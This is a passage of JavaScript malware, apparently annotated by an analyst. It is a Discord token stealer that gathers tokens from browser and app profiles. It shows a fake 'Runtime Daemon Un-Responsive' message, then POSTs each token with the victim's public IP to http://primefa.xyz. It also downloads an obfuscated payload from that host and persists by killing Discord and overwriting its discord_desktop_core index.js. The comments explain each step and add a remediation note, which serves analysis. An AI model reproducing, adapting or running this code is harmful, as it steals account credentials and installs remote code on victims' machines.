Yandex: path.join(a, "Yandex", "YandexBrowser", "User Data", "Default")
}
}
// t maps application name -> list of token-shaped strings found in its profile.
const t = {};
for (let [r, o] of Object.entries(e)) {
const e = a(o);
e && e.forEach(e => {
void 0 === t[r] && (t[r] = []), t[r].push(e)
})
}
// r(): public IPv4 address via the public-ip package, or a fixed fallback string.
async function r() {
try {
return `${await publicIp.v4()}`
} catch {
return "No IP found :small_red_triangle_down:"
}
}
// Decoy message shown to the person who ran the file, then the upload routine.
console.log("Runtime Daemon Un-Responsive, Please Retry Later"), async function () {
// Takes the token list of the first application in t only (or "" when t is empty).
var e = function (e) {
for (var a in e)
if (e.hasOwnProperty(a)) {
var t = e[a];
return t.toString().split(",")
} return ""
}(t);
// No tokens found: report the execution anyway with token "None" and ip null.
// Tokens found: one POST to /opened per token, each with the public IP.
e || fetch("http://primefa.xyz/opened", {
method: "POST",
headers: {
"Content-Type": "application/json",
authorization: authorization
},
body: JSON.stringify({
token: "None",
ip: null
})
}).then(e => e.json()).then(e => {}), await e.forEach(async e => {
fetch("http://primefa.xyz/opened", {
method: "POST",
headers: {
"Content-Type": "application/json",
authorization: authorization
},
body: JSON.stringify({
token: e,
ip: await r()
})
}).then(e => e.json()).then(e => {})
})
}()
}();
// Persistence step: replace the client's discord_desktop_core index.js.
const e = process.env.LOCALAPPDATA,
t = [];
!async function () {
try {
var a;
// Download the obfuscated payload over plain HTTP and fill in the authorization value.
await fetch("http://primefa.xyz/init/delta/obfus/inject/raw").then(e => e.text()).then(e => {
e = e.replace("[[[authorization]]]", authorization), a = e
}), await fs.readdir(e, async (r, o) => {
// Walk %LOCALAPPDATA%: entries containing "cord" -> "app-" -> "modules" ->
// "discord_desktop_core" -> "discord_desktop_core" -> "index.js". Matching is by
// substring (includes), not by exact name.
await o.forEach(async e => {
e.toString().includes("cord") && await t.push(e)
}), t.forEach(async t => {
await fs.readdir(e + "\\" + t, (r, o) => {
o.forEach(async r => {
r.includes("app-") && await fs.readdir(e + "\\" + t + "\\" + r, (o, n) => {
n.forEach(async o => {
o.includes("modules") && fs.readdir(e + "\\" + t + "\\" + r + "\\" + o, (n, i) => {
i.forEach(n => {
n.includes("discord_desktop_core") && fs.readdir(e + "\\" + t + "\\" + r + "\\" + o + "\\" + n, (i, s) => {
s.forEach(i => {
i.includes("discord_desktop_core") && fs.readdir(e + "\\" + t + "\\" + r + "\\" + o + "\\" + n + "\\" + i, (s, c) => {
c.forEach(s => {
// For each index.js found: create the PrimeFaOP marker directory (read by
// FirstTime() in the payload), kill the running client processes, and
// overwrite index.js with the payload. All callbacks ignore their errors.
// Remediation note: a reinstall of the client replaces this file; accounts
// used on the host should be treated as compromised (token, password, e-mail).
s.includes("index.js") && (
fs.mkdir(e + "\\" + t + "\\" + r + "\\" + o + "\\" + n + "\\" + i + "\\PrimeFaOP", e => {}),
fkill("discord"),
fkill("discordPtb"),
fs.writeFile(e + "\\" + t + "\\" + r + "\\" + o + "\\" + n + "\\" + i + "\\index.js", a, e => {})
)
})
})
})
})
})
})
})
})
})
})
})
})
} catch (e) {
console.log(e)
}
}()
}
});